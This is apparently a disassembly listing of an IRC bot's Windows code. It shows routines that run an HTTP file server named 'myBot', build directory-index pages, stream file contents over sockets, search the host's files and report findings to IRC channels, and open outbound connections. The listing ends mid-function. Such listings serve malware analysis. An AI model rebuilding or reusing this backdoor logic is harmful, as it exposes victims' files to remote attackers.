loc_405E47: ; CODE XREF: sub_405AF2+336�j
dec ebx
mov [ebp+var_138], ebx
jmp short loc_405E53
; ---------------------------------------------------------------------------
loc_405E50: ; CODE XREF: sub_405AF2+318�j
mov esi, [ebp+var_4]
loc_405E53: ; CODE XREF: sub_405AF2+32F�j
; sub_405AF2+35C�j
lea eax, [ebp+var_23C]
test eax, eax
jz short loc_405EBC
lea eax, [ebp+var_360]
push eax
call sub_417AB0
mov edi, eax
lea eax, [ebp+var_23C]
push eax
call sub_417AB0
add edi, eax
pop ecx
cmp edi, 104h
pop ecx
jnb short loc_405EBC
and [ebp+arg_0], 0
lea eax, [ebp+arg_0]
push eax
push 8004667Eh
push esi
call ds:dword_43F704 ; ioctlsocket
push [ebp+var_254]
lea eax, [ebp+var_23C]
push [ebp+var_248]
push eax
lea eax, [ebp+var_360]
push eax
push esi
call sub_4060D0
add esp, 14h
jmp short loc_405EC3
; ---------------------------------------------------------------------------
loc_405EBC: ; CODE XREF: sub_405AF2+369�j
; sub_405AF2+38F�j
push esi
call ds:dword_43F700 ; closesocket
loc_405EC3: ; CODE XREF: sub_405AF2+11D�j
; sub_405AF2+143�j ...
mov esi, [ebp+var_4]
inc esi
cmp esi, [ebp+var_8]
mov [ebp+var_4], esi
jbe loc_405BFF
jmp loc_405BC9
; ---------------------------------------------------------------------------
loc_405ED8: ; CODE XREF: sub_405AF2+102�j
mov edi, [ebp+var_C]
xor ebx, ebx
loc_405EDD: ; CODE XREF: sub_405AF2+6A�j
; sub_405AF2+92�j ...
call ds:dword_43F5FC ; WSAGetLastError
push eax
lea eax, [ebp+var_8F0]
push offset unk_42A36C
push eax
call sub_4172AE
add esp, 0Ch
cmp [ebp+var_24C], ebx
jnz short loc_405F23
push ebx
lea eax, [ebp+var_8F0]
push [ebp+var_250]
push eax
lea eax, [ebp+var_5E8]
push eax
push [ebp+var_5EC]
call sub_40D679
add esp, 14h
loc_405F23: ; CODE XREF: sub_405AF2+40C�j
lea eax, [ebp+var_8F0]
push eax
call sub_40BF6D
pop ecx
push edi
call ds:dword_43F700 ; closesocket
push [ebp+var_254]
call sub_417076
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
pop edi
pop esi
pop ebx
sub_405AF2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405F4D proc near ; DATA XREF: sub_4060D0+24D�o
var_1654 = byte ptr -1654h
var_654 = byte ptr -654h
var_550 = byte ptr -550h
var_44C = dword ptr -44Ch
var_3C8 = byte ptr -3C8h
var_2C4 = byte ptr -2C4h
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_A4 = dword ptr -0A4h
var_9C = byte ptr -9Ch
var_68 = byte ptr -68h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 1654h
call sub_417B30
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0ECh
mov esi, eax
lea edi, [ebp+var_44C]
rep movsd
mov dword ptr [eax+3ACh], 1
lea eax, [ebp+var_3C8]
push eax
lea eax, [ebp+var_550]
push eax
call sub_4172AE
pop ecx
lea eax, [ebp+var_2C4]
pop ecx
push eax
lea eax, [ebp+var_654]
push eax
call sub_4172AE
xor edi, edi
pop ecx
cmp [ebp+var_A4], edi
pop ecx
jz short loc_405FB3
push offset aTextHtml ; "text/html"
jmp short loc_405FB8
; ---------------------------------------------------------------------------
loc_405FB3: ; CODE XREF: sub_405F4D+5D�j
push offset aApplicationOct ; "application/octet-stream"
loc_405FB8: ; CODE XREF: sub_405F4D+64�j
lea eax, [ebp+var_9C]
push eax
call sub_4172AE
pop ecx
lea eax, [ebp+var_68]
pop ecx
mov esi, 409h
push 46h
push eax
push offset aDddDdMmmYyyy ; "ddd, dd MMM yyyy"
push edi
push edi
push esi
call ds:dword_42409C ; GetDateFormatA
lea eax, [ebp+var_20]
push 1Eh
push eax
push offset aHhMmSs ; "HH:mm:ss"
push edi
push edi
push esi
call ds:dword_424098 ; GetTimeFormatA
lea eax, [ebp+var_20]
cmp [ebp+var_B8], 0FFFFFFFFh
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_68]
push eax
jnz short loc_406031
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+var_1654]
push offset aHttp1_0200OkSe ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_4172AE
add esp, 24h
jmp short loc_406052
; ---------------------------------------------------------------------------
loc_406031: ; CODE XREF: sub_405F4D+C5�j
push [ebp+var_B8]
lea eax, [ebp+var_9C]
push eax
lea eax, [ebp+var_1654]
push offset aHttp1_0200Ok_0 ; "HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
push eax
call sub_4172AE
add esp, 28h
loc_406052: ; CODE XREF: sub_405F4D+E2�j
lea eax, [ebp+var_1654]
push edi
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_1654]
push eax
push [ebp+var_44C]
call ds:dword_43F6B8 ; send
cmp [ebp+var_A4], edi
jnz short loc_406092
lea eax, [ebp+var_550]
push eax
push [ebp+var_44C]
call sub_406A0D
pop ecx
pop ecx
jmp short loc_4060AF
; ---------------------------------------------------------------------------
loc_406092: ; CODE XREF: sub_405F4D+12D�j
lea eax, [ebp+var_654]
push eax
push edi
push [ebp+var_44C]
lea eax, [ebp+var_550]
push eax
call sub_406387
add esp, 10h
loc_4060AF: ; CODE XREF: sub_405F4D+143�j
push [ebp+var_44C]
call ds:dword_43F700 ; closesocket
push [ebp+var_B4]
call sub_417076
pop ecx
push edi
call ds:dword_424054 ; ExitThread
pop edi
pop esi
sub_405F4D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4060D0 proc near ; CODE XREF: sub_405AF2+3C0�p
var_8C4 = byte ptr -8C4h
var_6C4 = dword ptr -6C4h
var_640 = byte ptr -640h
var_53C = byte ptr -53Ch
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_31C = dword ptr -31Ch
var_318 = dword ptr -318h
var_314 = byte ptr -314h
var_211 = byte ptr -211h
var_210 = byte ptr -210h
var_10C = byte ptr -10Ch
var_10B = byte ptr -10Bh
var_10A = byte ptr -10Ah
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 8C4h
push ebx
push esi
push edi
xor edi, edi
push 104h
lea eax, [ebp+var_210]
push edi
push eax
mov [ebp+var_4], edi
call sub_417330
mov eax, [ebp+arg_8]
add esp, 0Ch
cmp byte ptr [eax], 2Fh
jz short loc_406106
push eax
push offset aS_4 ; "\\%s"
jmp short loc_40610F
; ---------------------------------------------------------------------------
loc_406106: ; CODE XREF: sub_4060D0+2C�j
push eax
mov byte ptr [eax], 5Ch
push offset aS_3 ; "%s"
loc_40610F: ; CODE XREF: sub_4060D0+34�j
lea eax, [ebp+var_10C]
push eax
call sub_4172AE
add esp, 0Ch
lea eax, [ebp+var_10C]
xor esi, esi
xor ebx, ebx
push eax
call sub_417AB0
test eax, eax
pop ecx
jbe short loc_4061AA
mov [ebp+arg_8], 2
loc_40613A: ; CODE XREF: sub_4060D0+D8�j
lea eax, [ebp+var_10C]
push eax
call sub_417AB0
cmp [ebp+arg_8], eax
pop ecx
jnb short loc_40617A
cmp [ebp+esi+var_10C], 25h
jnz short loc_40617A
cmp [ebp+esi+var_10B], 32h
jnz short loc_40617A
cmp [ebp+esi+var_10A], 30h
jnz short loc_40617A
inc esi
mov [ebp+ebx+var_210], 20h
inc esi
add [ebp+arg_8], 2
jmp short loc_406194
; ---------------------------------------------------------------------------
loc_40617A: ; CODE XREF: sub_4060D0+7A�j
; sub_4060D0+84�j ...
mov al, [ebp+esi+var_10C]
cmp al, 2Fh
jnz short loc_40618A
push 5Ch
pop eax
jmp short loc_40618D
; ---------------------------------------------------------------------------
loc_40618A: ; CODE XREF: sub_4060D0+B3�j
movsx eax, al
loc_40618D: ; CODE XREF: sub_4060D0+B8�j
mov [ebp+ebx+var_210], al
loc_406194: ; CODE XREF: sub_4060D0+A8�j
lea eax, [ebp+var_10C]
inc esi
inc [ebp+arg_8]
push eax
inc ebx
call sub_417AB0
cmp esi, eax
pop ecx
jb short loc_40613A
loc_4061AA: ; CODE XREF: sub_4060D0+61�j
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_314]
push [ebp+arg_4]
push offset aSS_2 ; "%s%s"
push eax
call sub_4172AE
lea eax, [ebp+var_314]
push offset asc_42A660 ; "\n"
push eax
call sub_418B6E
add esp, 18h
lea eax, [ebp+var_314]
push eax
call ds:off_4240A8
push 1
cmp eax, 10h
pop esi
jz short loc_4061FB
cmp eax, 0FFFFFFFFh
jnz short loc_4061FE
push [ebp+arg_0]
jmp loc_40627E
; ---------------------------------------------------------------------------
loc_4061FB: ; CODE XREF: sub_4060D0+11C�j
mov [ebp+var_4], esi
loc_4061FE: ; CODE XREF: sub_4060D0+121�j
cmp [ebp+ebx+var_211], 5Ch
jnz short loc_40620B
mov [ebp+var_4], esi
loc_40620B: ; CODE XREF: sub_4060D0+136�j
mov ebx, [ebp+arg_0]
cmp [ebp+var_4], edi
mov [ebp+var_6C4], ebx
mov [ebp+var_318], edi
jz short loc_406289
cmp [ebp+arg_C], edi
jz short loc_40627D
lea eax, [ebp+var_314]
push offset asc_42A65C ; "*"
push eax
call sub_4179D0
pop ecx
lea eax, [ebp+var_314]
pop ecx
push eax
lea eax, [ebp+var_640]
push eax
call sub_4172AE
lea eax, [ebp+var_210]
push eax
call sub_406ACA
add esp, 0Ch
lea eax, [ebp+var_210]
push eax
lea eax, [ebp+var_53C]
push eax
call sub_4172AE
or [ebp+var_330], 0FFFFFFFFh
pop ecx
pop ecx
mov [ebp+var_31C], esi
jmp short loc_4062D8
; ---------------------------------------------------------------------------
loc_40627D: ; CODE XREF: sub_4060D0+152�j
push ebx
loc_40627E: ; CODE XREF: sub_4060D0+126�j
call ds:dword_43F700 ; closesocket
jmp loc_406380
; ---------------------------------------------------------------------------
loc_406289: ; CODE XREF: sub_4060D0+14D�j
push edi
push edi
push 3
push edi
push esi
lea eax, [ebp+var_314]
push 80000000h
push eax
call ds:off_424084
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_4062D8
lea eax, [ebp+var_314]
push eax
lea eax, [ebp+var_640]
push eax
call sub_4172AE
pop ecx
mov [ebp+var_31C], edi
pop ecx
push edi
push esi
call ds:off_4240A4
push esi
mov [ebp+var_330], eax
call ds:off_424078
loc_4062D8: ; CODE XREF: sub_4060D0+1AB�j
; sub_4060D0+1D6�j
mov esi, [ebp+arg_10]
lea eax, [ebp+var_8C4]
push esi
push offset unk_42A61C
push eax
call sub_4172AE
push edi
lea eax, [ebp+var_8C4]
push 3
push eax
call sub_416D5A
mov [ebp+var_32C], eax
imul eax, 234h
add esp, 18h
mov ds:dword_4450C4[eax], esi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_6C4]
push edi
push eax
push offset sub_405F4D
push edi
push edi
call ds:dword_4240A0 ; CreateThread
mov ecx, [ebp+var_32C]
imul ecx, 234h
cmp eax, edi
mov ds:dword_4450D4[ecx], eax
jz short loc_406352
loc_406340: ; CODE XREF: sub_4060D0+280�j
cmp [ebp+var_318], edi
jnz short loc_406380
push 5
call ds:dword_424064 ; Sleep
jmp short loc_406340
; ---------------------------------------------------------------------------
loc_406352: ; CODE XREF: sub_4060D0+26E�j
push ebx
call ds:dword_43F700 ; closesocket
call ds:dword_42408C ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_8C4]
push offset unk_42A5D4
push eax
call sub_4172AE
lea eax, [ebp+var_8C4]
push eax
call sub_40BF6D
add esp, 10h
loc_406380: ; CODE XREF: sub_4060D0+1B4�j
; sub_4060D0+276�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_4060D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406387 proc near ; CODE XREF: sub_405F4D+15A�p
; sub_40EE72+49C9�p
var_594 = byte ptr -594h
var_490 = byte ptr -490h
var_388 = dword ptr -388h
var_374 = byte ptr -374h
var_368 = dword ptr -368h
var_35C = byte ptr -35Ch
var_248 = byte ptr -248h
var_48 = byte ptr -48h
var_20 = byte ptr -20h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 594h
push ebx
push esi
push edi
xor ebx, ebx
push 104h
lea eax, [ebp+var_594]
push ebx
push eax
mov [ebp+var_4], ebx
mov [ebp+var_8], ebx
call sub_417330
mov edi, [ebp+arg_0]
push offset asc_42A660 ; "\n"
push edi
call sub_418B6E
add esp, 14h
cmp [ebp+arg_8], ebx
jz short loc_4063E6
push edi
mov esi, 200h
push [ebp+arg_8]
lea eax, [ebp+var_248]
push offset aPrivmsgSSearch ; "PRIVMSG %s :Searching for: %s\r\n"
push esi
push eax
call sub_41782A
add esp, 14h
jmp loc_4064E5
; ---------------------------------------------------------------------------
loc_4063E6: ; CODE XREF: sub_406387+3A�j
cmp [ebp+arg_C], ebx
push edi
jz loc_4064CB
call sub_417AB0
pop ecx
mov [eax+edi-1], bl
push edi
mov esi, 200h
push offset aHtmlHeadTitleI ; "<HTML>\r\n<HEAD>\r\n<TITLE>Index of %s</TIT"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43F6B8 ; send
push edi
push offset aH1IndexOfSH1Ta ; "<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43F6B8 ; send
push edi
call sub_417AB0
pop ecx
mov byte ptr [eax+edi], 2Ah
push 3Ch
push 96h
push 0E6h
push offset aTrTdWidthDCode ; "<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41782A
add esp, 18h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43F6B8 ; send
push offset aTrTdColspan3Hr ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41782A
add esp, 0Ch
jmp short loc_4064E5
; ---------------------------------------------------------------------------
loc_4064CB: ; CODE XREF: sub_406387+63�j
mov esi, 200h
push offset aSearchingForS ; "Searching for: %s\r\n"
lea eax, [ebp+var_248]
push esi
push eax
call sub_41782A
add esp, 10h
loc_4064E5: ; CODE XREF: sub_406387+5A�j
; sub_406387+142�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43F6B8 ; send
cmp [ebp+arg_C], ebx
jz short loc_406580
push [ebp+arg_C]
call sub_417AB0
cmp eax, 2
pop ecx
jbe short loc_406580
push [ebp+arg_C]
call sub_417AB0
sub eax, 3
pop ecx
jz short loc_406531
loc_406525: ; CODE XREF: sub_406387+1A8�j
mov ecx, [ebp+arg_C]
cmp byte ptr [eax+ecx], 2Fh
jz short loc_406531
dec eax
jnz short loc_406525
loc_406531: ; CODE XREF: sub_406387+19C�j
; sub_406387+1A5�j
inc eax
push eax
lea eax, [ebp+var_594]
push [ebp+arg_C]
push eax
call sub_418C10
add esp, 0Ch
lea eax, [ebp+var_594]
push eax
push offset aTrTdColspan3AH ; "<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
lea eax, [ebp+var_248]
push esi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43F6B8 ; send
loc_406580: ; CODE XREF: sub_406387+180�j
; sub_406387+18E�j
lea eax, [ebp+var_388]
push eax
push edi
call ds:off_4240BC
lea ecx, [ebp+var_388]
mov [ebp+arg_0], eax
push ecx
push eax
call ds:off_4240B8
test eax, eax
jz loc_406970
mov edi, 1FFh
loc_4065AC: ; CODE XREF: sub_406387+5E3�j
cmp [ebp+var_388], ebx
jz loc_406958
lea eax, [ebp+var_35C]
push offset a__ ; ".."
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_406958
lea eax, [ebp+var_35C]
push offset a_ ; "."
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz loc_406958
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_374]
push eax
call ds:dword_4240B4 ; FileTimeToLocalFileTime
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_20]
push eax
call ds:dword_4240B0 ; FileTimeToSystemTime
mov ax, [ebp+var_10]
mov ecx, offset aPm ; "PM"
cmp ax, 0Ch
ja short loc_406621
mov ecx, offset aAm ; "AM"
loc_406621: ; CODE XREF: sub_406387+293�j
cmp ax, 0Ch
movzx eax, ax
jbe short loc_40662D
sub eax, 0Ch
loc_40662D: ; CODE XREF: sub_406387+2A1�j
push ecx
movzx ecx, [ebp+var_E]
push ecx
push eax
movzx eax, [ebp+var_18]
push eax
movzx eax, [ebp+var_12]
push eax
movzx eax, [ebp+var_16]
push eax
lea eax, [ebp+var_48]
push offset a2_2d2_2d4d2_2d ; "%2.2d/%2.2d/%4d %2.2d:%2.2d %s"
push eax
call sub_4172AE
add esp, 20h
test byte ptr [ebp+var_388], 10h
jz loc_4067D0
inc [ebp+var_8]
cmp [ebp+arg_8], ebx
jz short loc_4066A1
lea eax, [ebp+var_35C]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_490]
push 106h
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s21s ; "PRIVMSG %s :%-31s %-21s\n"
jmp loc_406919
; ---------------------------------------------------------------------------
loc_4066A1: ; CODE XREF: sub_406387+2E0�j
cmp [ebp+arg_C], ebx
jz loc_40678B
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43F6B8 ; send
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset aSS_0 ; "%s%s/"
push edi
push eax
call sub_41782A
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43F6B8 ; send
lea eax, [ebp+var_35C]
push eax
call sub_417AB0
cmp eax, 1Eh
pop ecx
lea eax, [ebp+var_35C]
push eax
jbe short loc_406741
push offset aCode_29sGtCode ; "\"><CODE>%.29s>/</CODE></A>"
jmp short loc_406746
; ---------------------------------------------------------------------------
loc_406741: ; CODE XREF: sub_406387+3B1�j
push offset aCodeSCodeA ; "\"><CODE>%s/</CODE></A>"
loc_406746: ; CODE XREF: sub_406387+3B8�j
lea eax, [ebp+var_248]
push edi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43F6B8 ; send
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCode ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_40691A
; ---------------------------------------------------------------------------
loc_40678B: ; CODE XREF: sub_406387+31D�j
lea eax, [ebp+var_35C]
push eax
push offset aS_0 ; "<%s>"
lea eax, [ebp+var_490]
push 106h
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_490]
push eax
push offset a31s21s ; "%-31s %-21s\r\n"
lea eax, [ebp+var_248]
push esi
push eax
call sub_41782A
add esp, 14h
jmp loc_406929
; ---------------------------------------------------------------------------
loc_4067D0: ; CODE XREF: sub_406387+2D4�j
inc [ebp+var_4]
cmp [ebp+arg_8], ebx
jz short loc_40680F
push ebx
push [ebp+var_368]
call sub_40D01A
pop ecx
pop ecx
push eax
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push [ebp+arg_8]
push offset aPrivmsgS31s2_0 ; "PRIVMSG %s :%-31s %-21s (%s bytes)\n"
push esi
loc_4067FB: ; CODE XREF: sub_406387+577�j
lea eax, [ebp+var_248]
push eax
call sub_41782A
add esp, 1Ch
jmp loc_406929
; ---------------------------------------------------------------------------
loc_40680F: ; CODE XREF: sub_406387+44F�j
cmp [ebp+arg_C], ebx
jz loc_406903
push 0E6h
push offset aTrTdWidthDAHre ; "<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
lea eax, [ebp+var_248]
push edi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43F6B8 ; send
lea eax, [ebp+var_35C]
push eax
lea eax, [ebp+var_248]
push [ebp+arg_C]
push offset aSS_2 ; "%s%s"
push edi
push eax
call sub_41782A
add esp, 14h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43F6B8 ; send
lea eax, [ebp+var_35C]
push eax
call sub_417AB0
cmp eax, 1Fh
pop ecx
lea eax, [ebp+var_35C]
push eax
jbe short loc_4068AF
push offset aCode_30sGtCode ; "\"><CODE>%.30s></CODE></A>"
jmp short loc_4068B4
; ---------------------------------------------------------------------------
loc_4068AF: ; CODE XREF: sub_406387+51F�j
push offset aCodeSCodeA_0 ; "\"><CODE>%s</CODE></A>"
loc_4068B4: ; CODE XREF: sub_406387+526�j
lea eax, [ebp+var_248]
push edi
push eax
call sub_41782A
add esp, 10h
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43F6B8 ; send
mov eax, [ebp+var_368]
shr eax, 0Ah
push eax
lea eax, [ebp+var_48]
push 3Ch
push eax
push 96h
push offset aTdTdWidthDCo_0 ; "</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
push edi
jmp loc_4067FB
; ---------------------------------------------------------------------------
loc_406903: ; CODE XREF: sub_406387+48B�j
push [ebp+var_368]
lea eax, [ebp+var_48]
push eax
lea eax, [ebp+var_35C]
push eax
push offset a31s21sIBytes ; "%-31s %-21s (%i bytes)\r\n"
loc_406919: ; CODE XREF: sub_406387+315�j
push esi
loc_40691A: ; CODE XREF: sub_406387+3FF�j
lea eax, [ebp+var_248]
push eax
call sub_41782A
add esp, 18h
loc_406929: ; CODE XREF: sub_406387+444�j
; sub_406387+483�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43F6B8 ; send
cmp [ebp+arg_8], ebx
jz short loc_406958
push 7D0h
call ds:dword_424064 ; Sleep
loc_406958: ; CODE XREF: sub_406387+22B�j
; sub_406387+246�j ...
lea eax, [ebp+var_388]
push eax
push [ebp+arg_0]
call ds:off_4240B8
test eax, eax
jnz loc_4065AC
loc_406970: ; CODE XREF: sub_406387+21A�j
push [ebp+arg_0]
call ds:off_4240AC
cmp [ebp+arg_8], ebx
jz short loc_4069B3
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_40D01A
pop ecx
pop ecx
push eax
mov eax, [ebp+var_4]
cdq
push edx
push eax
call sub_40D01A
pop ecx
pop ecx
push eax
lea eax, [ebp+var_248]
push [ebp+arg_8]
push offset aPrivmsgSFoundS ; "PRIVMSG %s :Found %s Files and %s Direc"...
push eax
call sub_4172AE
add esp, 14h
jmp short loc_4069E7
; ---------------------------------------------------------------------------
loc_4069B3: ; CODE XREF: sub_406387+5F5�j
cmp [ebp+arg_C], ebx
jz short loc_4069CD
lea eax, [ebp+var_248]
push offset aTrTdColspan3_0 ; "<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
push eax
call sub_4172AE
pop ecx
pop ecx
jmp short loc_4069E7
; ---------------------------------------------------------------------------
loc_4069CD: ; CODE XREF: sub_406387+62F�j
push [ebp+var_8]
lea eax, [ebp+var_248]
push [ebp+var_4]
push offset aFoundIFilesAnd ; "Found: %i Files and %i Directories\r\n"
push eax
call sub_4172AE
add esp, 10h
loc_4069E7: ; CODE XREF: sub_406387+62A�j
; sub_406387+644�j
lea eax, [ebp+var_248]
push ebx
push eax
call sub_417AB0
pop ecx
push eax
lea eax, [ebp+var_248]
push eax
push [ebp+arg_4]
call ds:dword_43F6B8 ; send
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn
sub_406387 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406A0D proc near ; CODE XREF: sub_405F4D+13C�p
var_404 = byte ptr -404h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 404h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push 3
push esi
push 1
push 80000000h
push [ebp+arg_4]
mov edi, 400h
mov [ebp+var_4], esi
call ds:off_424084
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz loc_406AC5
push esi
push ebx
call ds:off_4240A4
cmp eax, esi
mov [ebp+arg_4], eax
jz short loc_406ABE
loc_406A52: ; CODE XREF: sub_406A0D+AF�j
push 400h
lea eax, [ebp+var_404]
push esi
push eax
call sub_417330
add esp, 0Ch
cmp edi, [ebp+arg_4]
jbe short loc_406A6F
mov edi, [ebp+arg_4]
loc_406A6F: ; CODE XREF: sub_406A0D+5D�j
mov eax, [ebp+arg_4]
push 2
neg eax
push esi
push eax
push ebx
call ds:off_4240C0
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_404]
push edi
push eax
push ebx
call ds:off_424074
push esi
lea eax, [ebp+var_404]
push edi
push eax
push [ebp+arg_0]
call ds:dword_43F6B8 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_406AB9
call ds:dword_43F5FC ; WSAGetLastError
cmp eax, 2733h
jnz short loc_406ABE
xor eax, eax
loc_406AB9: ; CODE XREF: sub_406A0D+9B�j
sub [ebp+arg_4], eax
jnz short loc_406A52
loc_406ABE: ; CODE XREF: sub_406A0D+43�j
; sub_406A0D+A8�j
push ebx
call ds:off_424078
loc_406AC5: ; CODE XREF: sub_406A0D+30�j
pop edi
pop esi
pop ebx
leave
retn
sub_406A0D endp
; =============== S U B R O U T I N E =======================================
sub_406ACA proc near ; CODE XREF: sub_4060D0+181�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_417AB0
test eax, eax
pop ecx
jbe short loc_406AF3
loc_406ADD: ; CODE XREF: sub_406ACA+27�j
cmp byte ptr [esi+edi], 5Ch
jnz short loc_406AE7
mov byte ptr [esi+edi], 2Fh
loc_406AE7: ; CODE XREF: sub_406ACA+17�j
push edi
inc esi
call sub_417AB0
cmp esi, eax
pop ecx
jb short loc_406ADD
loc_406AF3: ; CODE XREF: sub_406ACA+11�j
mov eax, edi
pop edi
pop esi
retn
sub_406ACA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_406AF8 proc near ; CODE XREF: sub_40EE72+2BE6�p
var_4A0 = byte ptr -4A0h
var_310 = byte ptr -310h
var_110 = byte ptr -110h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
arg_20 = dword ptr 28h
push ebp
mov ebp, esp
sub esp, 4A0h
push ebx
lea eax, [ebp+var_4A0]
push edi
push eax
push 101h
call ds:dword_43F5E0 ; WSAStartup
push 6
push 1
push 2
call ds:dword_43F6E8 ; socket
mov ebx, eax
xor edi, edi
push 10h
lea eax, [ebp+var_10]
push edi
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_10], 2
push [ebp+arg_14]
call ds:dword_43F668 ; htons
push [ebp+arg_10]
mov [ebp+var_E], ax
call sub_40ADCA
pop ecx
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push ebx
call ds:dword_43F610 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_406BD5
mov eax, [ebp+arg_20]
cmp eax, edi
